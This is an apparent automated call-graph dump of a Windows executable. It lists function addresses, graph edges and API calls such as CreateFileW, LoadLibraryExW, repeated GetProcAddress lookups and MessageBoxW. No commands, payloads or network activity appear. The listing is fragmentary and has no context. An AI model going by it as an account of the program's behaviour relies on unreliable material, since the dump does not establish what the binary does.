7ff7fbdd611e GetLastError 16788->16789 16791 7ff7fbdd6134 16788->16791 16790 7ff7fbdd5438 _fread_nolock 11 API calls 16789->16790 16792 7ff7fbdd612b 16790->16792 16793 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16791->16793 16795 7ff7fbdd6130 16791->16795 16794 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16792->16794 16793->16795 16794->16795 16795->16778 16797 7ff7fbdd619f GetLastError 16796->16797 16801 7ff7fbdd61b5 __std_exception_copy 16796->16801 16798 7ff7fbdd5438 _fread_nolock 11 API calls 16797->16798 16799 7ff7fbdd61ac 16798->16799 16800 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16799->16800 16802 7ff7fbdd61b1 16800->16802 16801->16802 16803 7ff7fbdd620f GetFullPathNameW 16801->16803 16804 7ff7fbdd6244 16802->16804 16803->16797 16803->16802 16805 7ff7fbdd626d memcpy_s 16804->16805 16806 7ff7fbdd62b8 memcpy_s 16804->16806 16805->16806 16807 7ff7fbdd62a1 16805->16807 16811 7ff7fbdd62da 16805->16811 16806->16778 16808 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16807->16808 16809 7ff7fbdd62a6 16808->16809 16810 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16809->16810 16810->16806 16811->16806 16812 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16811->16812 16812->16809 16816 7ff7fbde02b0 16813->16816 16817 7ff7fbde02f2 16816->16817 16818 7ff7fbde02db 16816->16818 16820 7ff7fbde02f6 16817->16820 16821 7ff7fbde0317 16817->16821 16819 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16818->16819 16823 7ff7fbde02e0 16819->16823 16842 7ff7fbde041c 16820->16842 16854 7ff7fbddf918 16821->16854 16827 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16823->16827 16825 7ff7fbde031c 16830 7ff7fbde03c1 16825->16830 16837 7ff7fbde0343 16825->16837 16841 7ff7fbde02eb __std_exception_copy 16827->16841 16828 7ff7fbde02ff 16829 7ff7fbdd54a4 _fread_nolock 11 API calls 16828->16829 16831 7ff7fbde0304 16829->16831 16830->16818 16832 7ff7fbde03c9 16830->16832 16834 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16831->16834 16835 7ff7fbdd60f8 13 API calls 16832->16835 16833 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16836 7ff7fbde0411 16833->16836 16834->16823 16835->16841 16836->16778 16838 7ff7fbdd616c 14 API calls 16837->16838 16839 7ff7fbde0387 16838->16839 16840 7ff7fbdd6244 37 API calls 16839->16840 16839->16841 16840->16841 16841->16833 16843 7ff7fbde0466 16842->16843 16844 7ff7fbde0436 16842->16844 16845 7ff7fbde0471 GetDriveTypeW 16843->16845 16846 7ff7fbde0451 16843->16846 16847 7ff7fbdd54a4 _fread_nolock 11 API calls 16844->16847 16845->16846 16850 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16846->16850 16848 7ff7fbde043b 16847->16848 16849 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16848->16849 16851 7ff7fbde0446 16849->16851 16852 7ff7fbde02fb 16850->16852 16853 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16851->16853 16852->16825 16852->16828 16853->16846 16855 7ff7fbdcd0e0 memcpy_s 16854->16855 16856 7ff7fbddf94e GetCurrentDirectoryW 16855->16856 16857 7ff7fbddf965 16856->16857 16858 7ff7fbddf98c 16856->16858 16860 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16857->16860 16859 7ff7fbddf158 _wfindfirst32i64 11 API calls 16858->16859 16861 7ff7fbddf99b 16859->16861 16862 7ff7fbddf9f9 16860->16862 16863 7ff7fbddf9b4 16861->16863 16864 7ff7fbddf9a5 GetCurrentDirectoryW 16861->16864 16862->16825 16866 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16863->16866 16864->16863 16865 7ff7fbddf9b9 16864->16865 16867 7ff7fbddaf0c __free_lconv_num 11 API calls 16865->16867 16866->16865 16867->16857 16875 7ff7fbde0cb8 EnterCriticalSection 16868->16875 16877 7ff7fbdc1726 16876->16877 16878 7ff7fbdc173e 16876->16878 16879 7ff7fbdc2b30 59 API calls 16877->16879 16880 7ff7fbdc1744 16878->16880 16881 7ff7fbdc1768 16878->16881 16884 7ff7fbdc1732 16879->16884 17006 7ff7fbdc12b0 16880->17006 16969 7ff7fbdc7c10 16881->16969 16884->15629 16887 7ff7fbdc175f 16887->15629 16888 7ff7fbdc17b9 16892 7ff7fbdc3fd0 116 API calls 16888->16892 16889 7ff7fbdc178d 16891 7ff7fbdc2890 59 API calls 16889->16891 16890 7ff7fbdc2b30 59 API calls 16890->16887 16893 7ff7fbdc17a3 16891->16893 16894 7ff7fbdc17ce 16892->16894 16893->15629 16895 7ff7fbdc17d6 16894->16895 16896 7ff7fbdc17ee 16894->16896 16898 7ff7fbdc2b30 59 API calls 16895->16898 16897 7ff7fbdd0814 73 API calls 16896->16897 16899 7ff7fbdc17ff 16897->16899 16900 7ff7fbdc17e5 16898->16900 16901 7ff7fbdc1823 16899->16901 16902 7ff7fbdc1803 16899->16902 16904 7ff7fbdd018c 74 API calls 16900->16904 16905 7ff7fbdc1841 16901->16905 16906 7ff7fbdc1829 16901->16906 16903 7ff7fbdc2890 59 API calls 16902->16903 16912 7ff7fbdc1819 __std_exception_copy 16903->16912 16907 7ff7fbdc1937 16904->16907 16910 7ff7fbdc1863 16905->16910 16916 7ff7fbdc1882 16905->16916 16988 7ff7fbdc1050 16906->16988 16907->15629 16909 7ff7fbdd018c 74 API calls 16909->16900 16911 7ff7fbdc2890 59 API calls 16910->16911 16911->16912 16912->16909 16913 7ff7fbdd04dc _fread_nolock 53 API calls 16913->16916 16914 7ff7fbdc18e5 16917 7ff7fbdc2890 59 API calls 16914->16917 16916->16912 16916->16913 16916->16914 17045 7ff7fbdd0c1c 16916->17045 16917->16912 16919 7ff7fbdc2d86 16918->16919 16920 7ff7fbdc1ef0 49 API calls 16919->16920 16922 7ff7fbdc2db9 16920->16922 16921 7ff7fbdc30ea 16922->16921 16923 7ff7fbdc3e40 49 API calls 16922->16923 16924 7ff7fbdc2e27 16923->16924 16925 7ff7fbdc3e40 49 API calls 16924->16925 16926 7ff7fbdc2e38 16925->16926 16927 7ff7fbdc2e95 16926->16927 16928 7ff7fbdc2e59 16926->16928 16930 7ff7fbdc31b0 75 API calls 16927->16930 17141 7ff7fbdc31b0 16928->17141 16931 7ff7fbdc2e93 16930->16931 16932 7ff7fbdc2f16 16931->16932 16933 7ff7fbdc2ed4 16931->16933 16935 7ff7fbdc31b0 75 API calls 16932->16935 17149 7ff7fbdc75a0 16933->17149 16937 7ff7fbdc2f40 16935->16937 16941 7ff7fbdc31b0 75 API calls 16937->16941 16946 7ff7fbdc2fdc 16937->16946 16938 7ff7fbdc3171 16945 7ff7fbdc2b30 59 API calls 16938->16945 16939 7ff7fbdc2ef7 16943 7ff7fbdc2f72 16941->16943 16942 7ff7fbdc2f11 16948 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16942->16948 16943->16946 16949 7ff7fbdc31b0 75 API calls 16943->16949 16944 7ff7fbdc1eb0 59 API calls 16947 7ff7fbdc302f 16944->16947 16945->16921 16946->16944 16962 7ff7fbdc30ef 16946->16962 16947->16921 16952 7ff7fbdc1ef0 49 API calls 16947->16952 16950 7ff7fbdc2fd1 16948->16950 16951 7ff7fbdc2fa0 16949->16951 16950->15629 16951->16946 16953 7ff7fbdc2fa4 16951->16953 16954 7ff7fbdc3057 16952->16954 16955 7ff7fbdc2b30 59 API calls 16953->16955 16954->16938 16956 7ff7fbdc1ef0 49 API calls 16954->16956 16955->16942 16958 7ff7fbdc3084 16956->16958 16957 7ff7fbdc2b30 59 API calls 16960 7ff7fbdc3148 16957->16960 16958->16938 16961 7ff7fbdc1ef0 49 API calls 16958->16961 16960->16938 16960->16957 16964 7ff7fbdc1710 144 API calls 16960->16964 16963 7ff7fbdc30b1 16961->16963 16962->16960 17186 7ff7fbdd5070 16962->17186 16963->16938 16965 7ff7fbdc1aa0 121 API calls 16963->16965 16964->16960 16970 7ff7fbdc7c20 16969->16970 16971 7ff7fbdc1ef0 49 API calls 16970->16971 16972 7ff7fbdc7c61 16971->16972 16986 7ff7fbdc7ce1 16972->16986 17049 7ff7fbdc3f60 16972->17049 16974 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16976 7ff7fbdc1785 16974->16976 16976->16888 16976->16889 16977 7ff7fbdc7d1b 17055 7ff7fbdc77c0 16977->17055 16979 7ff7fbdc7b60 61 API calls 16987 7ff7fbdc7c92 __std_exception_copy 16979->16987 16981 7ff7fbdc7cd0 17069 7ff7fbdc2c50 16981->17069 16982 7ff7fbdc7d04 16983 7ff7fbdc2c50 59 API calls 16982->16983 16983->16977 16985 7ff7fbdc3fd0 116 API calls 16985->16986 16986->16974 16987->16981 16987->16982 16989 7ff7fbdc10a6 16988->16989 16990 7ff7fbdc10d3 16989->16990 16991 7ff7fbdc10ad 16989->16991 16994 7ff7fbdc1109 16990->16994 16995 7ff7fbdc10ed 16990->16995 16992 7ff7fbdc2b30 59 API calls 16991->16992 16993 7ff7fbdc10c0 16992->16993 16993->16912 16997 7ff7fbdc111b 16994->16997 17000 7ff7fbdc1137 memcpy_s 16994->17000 16996 7ff7fbdc2890 59 API calls 16995->16996 17001 7ff7fbdc1104 __std_exception_copy 16996->17001 16998 7ff7fbdc2890 59 API calls 16997->16998 16998->17001 16999 7ff7fbdd04dc _fread_nolock 53 API calls 16999->17000 17000->16999 17000->17001 17003 7ff7fbdd0c1c 76 API calls 17000->17003 17004 7ff7fbdc11fe 17000->17004 17005 7ff7fbdd0250 37 API calls 17000->17005 17001->16912 17003->17000 17005->17000 17007 7ff7fbdc12c2 17006->17007 17008 7ff7fbdc3fd0 116 API calls 17007->17008 17009 7ff7fbdc12f2 17008->17009 17010 7ff7fbdc1311 17009->17010 17011 7ff7fbdc12fa 17009->17011 17013 7ff7fbdd0814 73 API calls 17010->17013 17012 7ff7fbdc2b30 59 API calls 17011->17012 17019 7ff7fbdc130a __std_exception_copy 17012->17019 17014 7ff7fbdc1323 17013->17014 17015 7ff7fbdc1327 17014->17015 17016 7ff7fbdc134d 17014->17016 17017 7ff7fbdc2890 59 API calls 17015->17017 17021 7ff7fbdc1390 17016->17021 17022 7ff7fbdc1368 17016->17022 17018 7ff7fbdc133e 17017->17018 17020 7ff7fbdd018c 74 API calls 17018->17020 17023 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17019->17023 17020->17019 17026 7ff7fbdc13aa 17021->17026 17037 7ff7fbdc1463 17021->17037 17025 7ff7fbdc2890 59 API calls 17022->17025 17024 7ff7fbdc1454 17023->17024 17024->16887 17024->16890 17028 7ff7fbdc1383 17025->17028 17029 7ff7fbdc1050 98 API calls 17026->17029 17027 7ff7fbdc13c3 17030 7ff7fbdd018c 74 API calls 17027->17030 17031 7ff7fbdd018c 74 API calls 17028->17031 17032 7ff7fbdc13bb 17029->17032 17033 7ff7fbdc13cf 17030->17033 17031->17019 17032->17027 17035 7ff7fbdc14d2 __std_exception_copy 17032->17035 17036 7ff7fbdc77c0 72 API calls 17033->17036 17034 7ff7fbdd04dc _fread_nolock 53 API calls 17034->17037 17041 7ff7fbdd018c 74 API calls 17035->17041 17038 7ff7fbdc13de 17036->17038 17037->17027 17037->17034 17039 7ff7fbdc14bb 17037->17039 17038->17019 17042 7ff7fbdc1ef0 49 API calls 17038->17042 17040 7ff7fbdc2890 59 API calls 17039->17040 17040->17035 17041->17019 17043 7ff7fbdc140c 17042->17043 17043->17019 17112 7ff7fbdc4170 17043->17112 17046 7ff7fbdd0c4c 17045->17046 17126 7ff7fbdd096c 17046->17126 17048 7ff7fbdd0c6a 17048->16916 17050 7ff7fbdc3f6a 17049->17050 17051 7ff7fbdc8ae0 57 API calls 17050->17051 17052 7ff7fbdc3f92 17051->17052 17053 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17052->17053 17054 7ff7fbdc3fba 17053->17054 17054->16977 17054->16979 17054->16987 17056 7ff7fbdc77d0 17055->17056 17057 7ff7fbdc1ef0 49 API calls 17056->17057 17058 7ff7fbdc7801 17057->17058 17059 7ff7fbdc7919 17058->17059 17060 7ff7fbdc1ef0 49 API calls 17058->17060 17061 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17059->17061 17063 7ff7fbdc7828 17060->17063 17062 7ff7fbdc792e 17061->17062 17062->16985 17062->16986 17063->17059 17082 7ff7fbdd60c8 17063->17082 17070 7ff7fbdc2c70 17069->17070 17071 7ff7fbdd4ac4 49 API calls 17070->17071 17072 7ff7fbdc2cbb memcpy_s 17071->17072 17073 7ff7fbdc8ae0 57 API calls 17072->17073 17074 7ff7fbdc2cf0 17073->17074 17075 7ff7fbdc2cf5 17074->17075 17076 7ff7fbdc2d2d MessageBoxA 17074->17076 17077 7ff7fbdc8ae0 57 API calls 17075->17077 17078 7ff7fbdc2d47 17076->17078 17079 7ff7fbdc2d0f MessageBoxW 17077->17079 17080 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17078->17080 17079->17078 17083 7ff7fbddb710 __CxxCallCatchBlock 45 API calls 17082->17083 17084 7ff7fbdd60dd 17083->17084 17085 7ff7fbde02a7 17084->17085 17086 7ff7fbde01c6 17084->17086 17086->17086 17113 7ff7fbdc4180 17112->17113 17114 7ff7fbdc8ae0 57 API calls 17113->17114 17115 7ff7fbdc41ae 17114->17115 17127 7ff7fbdd098c 17126->17127 17128 7ff7fbdd09b9 17126->17128 17127->17128 17129 7ff7fbdd0996 17127->17129 17130 7ff7fbdd09c1 17127->17130 17128->17048 17142 7ff7fbdc31e4 17141->17142 17143 7ff7fbdd4ac4 49 API calls 17142->17143 17144 7ff7fbdc320a 17143->17144 17145 7ff7fbdc321b 17144->17145 17201 7ff7fbdd5dec 17144->17201 17147 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17145->17147 17148 7ff7fbdc3239 17147->17148 17148->16931 17150 7ff7fbdc75ae 17149->17150 17151 7ff7fbdc3fd0 116 API calls 17150->17151 17152 7ff7fbdc75dd 17151->17152 17153 7ff7fbdc1ef0 49 API calls 17152->17153 17154 7ff7fbdc7606 17153->17154 17155 7ff7fbdc3f60 57 API calls 17154->17155 17168 7ff7fbdc760d 17154->17168 17162 7ff7fbdc7620 17155->17162 17156 7ff7fbdc7789 17159 7ff7fbdd018c 74 API calls 17156->17159 17179 7ff7fbdc7785 17156->17179 17157 7ff7fbdc76e9 17381 7ff7fbdd0224 17157->17381 17158 7ff7fbdc76a4 17161 7ff7fbdc77c0 72 API calls 17158->17161 17159->17179 17163 7ff7fbdc76af 17161->17163 17162->17158 17164 7ff7fbdc7b60 61 API calls 17162->17164 17169 7ff7fbdc763e __std_exception_copy 17162->17169 17163->17168 17175 7ff7fbdc3fd0 116 API calls 17163->17175 17164->17169 17165 7ff7fbdc768d 17173 7ff7fbdc2c50 59 API calls 17165->17173 17166 7ff7fbdc7677 17170 7ff7fbdc2c50 59 API calls 17166->17170 17167 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17172 7ff7fbdc2eee 17167->17172 17168->17156 17168->17157 17169->17165 17169->17166 17170->17168 17171 7ff7fbdc7766 17174 7ff7fbdd018c 74 API calls 17171->17174 17172->16938 17172->16939 17173->17158 17175->17168 17177 7ff7fbdd04dc _fread_nolock 53 API calls 17184 7ff7fbdc76ee 17177->17184 17179->17167 17180 7ff7fbdd0c1c 76 API calls 17180->17184 17181 7ff7fbdd0250 37 API calls 17181->17184 17182 7ff7fbdc772c 17183 7ff7fbdd0224 37 API calls 17183->17184 17184->17171 17184->17177 17184->17180 17184->17181 17184->17182 17184->17183 17187 7ff7fbdd507d 17186->17187 17188 7ff7fbdd50aa 17186->17188 17190 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17187->17190 17194 7ff7fbdd5034 17187->17194 17189 7ff7fbdd50cd 17188->17189 17192 7ff7fbdd50e9 17188->17192 17191 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17189->17191 17193 7ff7fbdd5087 17190->17193 17195 7ff7fbdd50d2 17191->17195 17196 7ff7fbdd4f98 45 API calls 17192->17196 17197 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 17193->17197 17194->16962 17199 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 17195->17199 17200 7ff7fbdd50dd 17196->17200 17198 7ff7fbdd5092 17197->17198 17198->16962 17199->17200 17200->16962 17202 7ff7fbdd5e15 17201->17202 17203 7ff7fbdd5e09 17201->17203 17243 7ff7fbdd4f98 17202->17243 17218 7ff7fbdd5700 17203->17218 17210 7ff7fbdd5e4d 17254 7ff7fbdd5584 17210->17254 17211 7ff7fbdd5ebd 17214 7ff7fbdd5700 69 API calls 17211->17214 17212 7ff7fbdd5ea9 17213 7ff7fbdd5e0e 17212->17213 17215 7ff7fbddaf0c __free_lconv_num 11 API calls 17212->17215 17213->17145 17216 7ff7fbdd5ec9 17214->17216 17215->17213 17216->17213 17219 7ff7fbdd5737 17218->17219 17220 7ff7fbdd571a 17218->17220 17219->17220 17222 7ff7fbdd574a CreateFileW 17219->17222 17221 7ff7fbdd54a4 _fread_nolock 11 API calls 17220->17221 17223 7ff7fbdd571f 17221->17223 17224 7ff7fbdd57b4 17222->17224 17225 7ff7fbdd577e 17222->17225 17228 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17223->17228 17302 7ff7fbdd5cdc 17224->17302 17276 7ff7fbdd5854 GetFileType 17225->17276 17231 7ff7fbdd5727 17228->17231 17236 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 17231->17236 17234 7ff7fbdd57bd 17235 7ff7fbdd57e8 17237 7ff7fbdd5732 17236->17237 17237->17213 17244 7ff7fbdd4fbc 17243->17244 17245 7ff7fbdd4fb7 17243->17245 17244->17245 17246 7ff7fbddb710 __CxxCallCatchBlock 45 API calls 17244->17246 17245->17210 17251 7ff7fbddf3e4 17245->17251 17247 7ff7fbdd4fd7 17246->17247 17364 7ff7fbdddf44 17247->17364 17372 7ff7fbddf1d0 17251->17372 17255 7ff7fbdd55d2 17254->17255 17256 7ff7fbdd55ae 17254->17256 17257 7ff7fbdd562c 17255->17257 17258 7ff7fbdd55d7 17255->17258 17260 7ff7fbddaf0c __free_lconv_num 11 API calls 17256->17260 17265 7ff7fbdd55bd 17256->17265 17259 7ff7fbddfc00 _fread_nolock MultiByteToWideChar 17257->17259 17261 7ff7fbdd55ec 17258->17261 17262 7ff7fbddaf0c __free_lconv_num 11 API calls 17258->17262 17258->17265 17268 7ff7fbdd5648 17259->17268 17260->17265 17263 7ff7fbdddbbc _fread_nolock 12 API calls 17261->17263 17262->17261 17263->17265 17264 7ff7fbdd564f GetLastError 17265->17211 17265->17212 17266 7ff7fbdd568a 17266->17265 17268->17264 17268->17266 17269 7ff7fbdd567d 17268->17269 17273 7ff7fbddaf0c __free_lconv_num 11 API calls 17268->17273 17273->17269 17277 7ff7fbdd595f 17276->17277 17278 7ff7fbdd58a2 17276->17278 17280 7ff7fbdd5967 17277->17280 17281 7ff7fbdd5989 17277->17281 17279 7ff7fbdd58ce GetFileInformationByHandle 17278->17279 17283 7ff7fbdd5bd8 21 API calls 17278->17283 17284 7ff7fbdd58f7 17279->17284 17285 7ff7fbdd597a GetLastError 17279->17285 17280->17285 17286 7ff7fbdd596b 17280->17286 17282 7ff7fbdd59ac PeekNamedPipe 17281->17282 17300 7ff7fbdd594a 17281->17300 17282->17300 17287 7ff7fbdd58bc 17283->17287 17288 7ff7fbdd5a9c 51 API calls 17284->17288 17290 7ff7fbdd5438 _fread_nolock 11 API calls 17285->17290 17289 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17286->17289 17287->17279 17287->17300 17292 7ff7fbdd5902 17288->17292 17289->17300 17290->17300 17291 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17293 7ff7fbdd578c 17291->17293 17300->17291 17303 7ff7fbdd5d12 17302->17303 17304 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17303->17304 17322 7ff7fbdd5daa __std_exception_copy 17303->17322 17306 7ff7fbdd5d24 17304->17306 17305 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17307 7ff7fbdd57b9 17305->17307 17308 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17306->17308 17307->17234 17307->17235 17309 7ff7fbdd5d2c 17308->17309 17322->17305 17365 7ff7fbdddf59 17364->17365 17367 7ff7fbdd4ffa 17364->17367 17366 7ff7fbde3974 45 API calls 17365->17366 17365->17367 17366->17367 17368 7ff7fbdddfb0 17367->17368 17369 7ff7fbdddfc5 17368->17369 17371 7ff7fbdddfd8 17368->17371 17370 7ff7fbde2cc0 45 API calls 17369->17370 17369->17371 17370->17371 17371->17245 17373 7ff7fbddf22d 17372->17373 17379 7ff7fbddf228 __vcrt_FlsAlloc 17372->17379 17373->17210 17374 7ff7fbddf25d LoadLibraryExW 17376 7ff7fbddf332 17374->17376 17377 7ff7fbddf282 GetLastError 17374->17377 17375 7ff7fbddf352 GetProcAddress 17375->17373 17376->17375 17378 7ff7fbddf349 FreeLibrary 17376->17378 17377->17379 17378->17375 17379->17373 17379->17374 17379->17375 17380 7ff7fbddf2bc LoadLibraryExW 17379->17380 17380->17376 17380->17379 17382 7ff7fbdd022d 17381->17382 17383 7ff7fbdd023d 17381->17383 17384 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17382->17384 17383->17184 17385 7ff7fbdd0232 17384->17385 17408 7ff7fbddaa1d 17407->17408 17412 7ff7fbdc812a 17407->17412 17409 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17408->17409 17410 7ff7fbddaa22 17409->17410 17411 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 17410->17411 17411->17412 17413 7ff7fbdd8630 17412->17413 17414 7ff7fbdd864e 17413->17414 17415 7ff7fbdd8639 17413->17415 17417 7ff7fbdd54a4 _fread_nolock 11 API calls 17414->17417 17419 7ff7fbdd8646 17414->17419 17416 7ff7fbdd54a4 _fread_nolock 11 API calls 17415->17416 17418 7ff7fbdd863e 17416->17418 17420 7ff7fbdd8689 17417->17420 17421 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17418->17421 17419->15646 17422 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17420->17422 17421->17419 17423 7ff7fbdd8691 17422->17423 17426 7ff7fbdd63dc 17425->17426 17427 7ff7fbdd6402 17426->17427 17429 7ff7fbdd6435 17426->17429 17428 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17427->17428 17430 7ff7fbdd6407 17428->17430 17431 7ff7fbdd643b 17429->17431 17432 7ff7fbdd6448 17429->17432 17433 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 17430->17433 17434 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 17431->17434 17444 7ff7fbddb1ec 17432->17444 17436 7ff7fbdc4029 17433->17436 17434->17436 17436->15682 17457 7ff7fbde0cb8 EnterCriticalSection 17444->17457 17805 7ff7fbdd90a0 17804->17805 17808 7ff7fbdd8b7c 17805->17808 17807 7ff7fbdd90b9 17807->15692 17809 7ff7fbdd8bc6 17808->17809 17810 7ff7fbdd8b97 17808->17810 17818 7ff7fbdd536c EnterCriticalSection 17809->17818 17811 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 17810->17811 17813 7ff7fbdd8bb7 17811->17813 17813->17807 17820 7ff7fbdcff83 17819->17820 17821 7ff7fbdcffb1 17819->17821 17822 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 17820->17822 17828 7ff7fbdcffa3 17821->17828 17829 7ff7fbdd536c EnterCriticalSection 17821->17829 17822->17828 17828->15696 17831 7ff7fbdc3fd0 116 API calls 17830->17831 17832 7ff7fbdc15c7 17831->17832 17833 7ff7fbdc15f0 17832->17833 17834 7ff7fbdc15cf 17832->17834 17836 7ff7fbdd0814 73 API calls 17833->17836 17835 7ff7fbdc2b30 59 API calls 17834->17835 17837 7ff7fbdc15df 17835->17837 17838 7ff7fbdc1601 17836->17838 17837->15701 17839 7ff7fbdc1605 17838->17839 17841 7ff7fbdc1621 17838->17841 17840 7ff7fbdc2890 59 API calls 17839->17840 17849 7ff7fbdc161c __std_exception_copy 17840->17849 17842 7ff7fbdc1651 17841->17842 17843 7ff7fbdc1631 17841->17843 17844 7ff7fbdc1666 17842->17844 17851 7ff7fbdc167d 17842->17851 17846 7ff7fbdc2890 59 API calls 17843->17846 17847 7ff7fbdc1050 98 API calls 17844->17847 17845 7ff7fbdd018c 74 API calls 17848 7ff7fbdc16f7 17845->17848 17846->17849 17847->17849 17848->15701 17849->17845 17850 7ff7fbdd04dc _fread_nolock 53 API calls 17850->17851 17851->17849 17851->17850 17852 7ff7fbdc16be 17851->17852 17853 7ff7fbdc2890 59 API calls 17852->17853 17853->17849 17856 7ff7fbdc19d3 17854->17856 17857 7ff7fbdc196f 17854->17857 17855 7ff7fbdd5070 45 API calls 17855->17857 17856->15720 17857->17855 17857->17856 17859 7ff7fbdc8ae0 57 API calls 17858->17859 17860 7ff7fbdc8277 LoadLibraryExW 17859->17860 17861 7ff7fbdc8294 __std_exception_copy 17860->17861 17861->15728 17863 7ff7fbdc6f3c GetProcAddress 17862->17863 17870 7ff7fbdc6f19 17862->17870 17864 7ff7fbdc6f61 GetProcAddress 17863->17864 17863->17870 17865 7ff7fbdc6f86 GetProcAddress 17864->17865 17864->17870 17867 7ff7fbdc6fae GetProcAddress 17865->17867 17865->17870 17866 7ff7fbdc29e0 57 API calls 17868 7ff7fbdc6f2c 17866->17868 17869 7ff7fbdc6fd6 GetProcAddress 17867->17869 17867->17870 17868->15735 17869->17870 17871 7ff7fbdc6ffe GetProcAddress 17869->17871 17870->17866 17872 7ff7fbdc7026 GetProcAddress 17871->17872 17873 7ff7fbdc701a 17871->17873 17874 7ff7fbdc7042 17872->17874 17875 7ff7fbdc704e GetProcAddress 17872->17875 17873->17872 17874->17875 17921->15743 17922->15746 17924 7ff7fbdc5bd0 17923->17924 17925 7ff7fbdc1ef0 49 API calls 17924->17925 17926 7ff7fbdc5c02 17925->17926 17927 7ff7fbdc5c0b 17926->17927 17930 7ff7fbdc5c2b 17926->17930 17928 7ff7fbdc2b30 59 API calls 17927->17928 17932 7ff7fbdc5c21 17928->17932 17929 7ff7fbdc5c82 17931 7ff7fbdc4050 49 API calls 17929->17931 17930->17929 17933 7ff7fbdc4050 49 API calls 17930->17933 17935 7ff7fbdc5c9b 17931->17935 17937 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 17932->17937 17934 7ff7fbdc5c4c 17933->17934 17936 7ff7fbdc5c6a 17934->17936 17939 7ff7fbdc2b30 59 API calls 17934->17939 17938 7ff7fbdc5cb9 17935->17938 17942 7ff7fbdc2b30 59 API calls 17935->17942 17940 7ff7fbdc3f60 57 API calls 17936->17940 17941 7ff7fbdc346e 17937->17941 17943 7ff7fbdc8260 58 API calls 17938->17943 17939->17936 17944 7ff7fbdc5c74 17940->17944 17941->15755 17951 7ff7fbdc5d20 17941->17951 17942->17938 17945 7ff7fbdc5cc6 17943->17945 17944->17929 17950 7ff7fbdc8260 58 API calls 17944->17950 17946 7ff7fbdc5ced 17945->17946 17947 7ff7fbdc5ccb 17945->17947 18021 7ff7fbdc51e0 GetProcAddress 17946->18021 17948 7ff7fbdc29e0 57 API calls 17947->17948 17948->17932 17950->17929 18105 7ff7fbdc4de0 17951->18105 17953 7ff7fbdc5d44 17954 7ff7fbdc5d5d 17953->17954 17955 7ff7fbdc5d4c 17953->17955 18112 7ff7fbdc4530 17954->18112 17956 7ff7fbdc2b30 59 API calls 17955->17956 17962 7ff7fbdc5d58 17956->17962 17959 7ff7fbdc5d7a 17963 7ff7fbdc5d98 17959->17963 17964 7ff7fbdc5d87 17959->17964 17960 7ff7fbdc5d69 17961 7ff7fbdc2b30 59 API calls 17960->17961 17961->17962 17962->15757 18116 7ff7fbdc4870 17963->18116 17965 7ff7fbdc2b30 59 API calls 17964->17965 17965->17962 17993 7ff7fbdc5937 17992->17993 17993->17993 17994 7ff7fbdc5960 17993->17994 17997 7ff7fbdc5977 __std_exception_copy 17993->17997 17995 7ff7fbdc2b30 59 API calls 17994->17995 17996 7ff7fbdc596c 17995->17996 17996->15759 17998 7ff7fbdc15a0 122 API calls 17997->17998 17999 7ff7fbdc2b30 59 API calls 17997->17999 18000 7ff7fbdc5a67 17997->18000 17998->17997 17999->17997 18000->15759 18022 7ff7fbdc5202 18021->18022 18023 7ff7fbdc5220 GetProcAddress 18021->18023 18026 7ff7fbdc29e0 57 API calls 18022->18026 18023->18022 18024 7ff7fbdc5245 GetProcAddress 18023->18024 18024->18022 18025 7ff7fbdc526a GetProcAddress 18024->18025 18025->18022 18027 7ff7fbdc5292 GetProcAddress 18025->18027 18028 7ff7fbdc5215 18026->18028 18027->18022 18029 7ff7fbdc52ba GetProcAddress 18027->18029 18028->17932 18029->18022 18030 7ff7fbdc52e2 GetProcAddress 18029->18030 18030->18022 18031 7ff7fbdc530a GetProcAddress 18030->18031 18032 7ff7fbdc5332 GetProcAddress 18031->18032 18033 7ff7fbdc5326 18031->18033 18034 7ff7fbdc535a GetProcAddress 18032->18034 18035 7ff7fbdc534e 18032->18035 18033->18032 18036 7ff7fbdc5382 GetProcAddress 18034->18036 18037 7ff7fbdc5376 18034->18037 18035->18034 18038 7ff7fbdc53aa GetProcAddress 18036->18038 18039 7ff7fbdc539e 18036->18039 18037->18036 18039->18038 18107 7ff7fbdc4e05 18105->18107 18106 7ff7fbdc4e0d 18106->17953 18107->18106 18110 7ff7fbdc4f9f 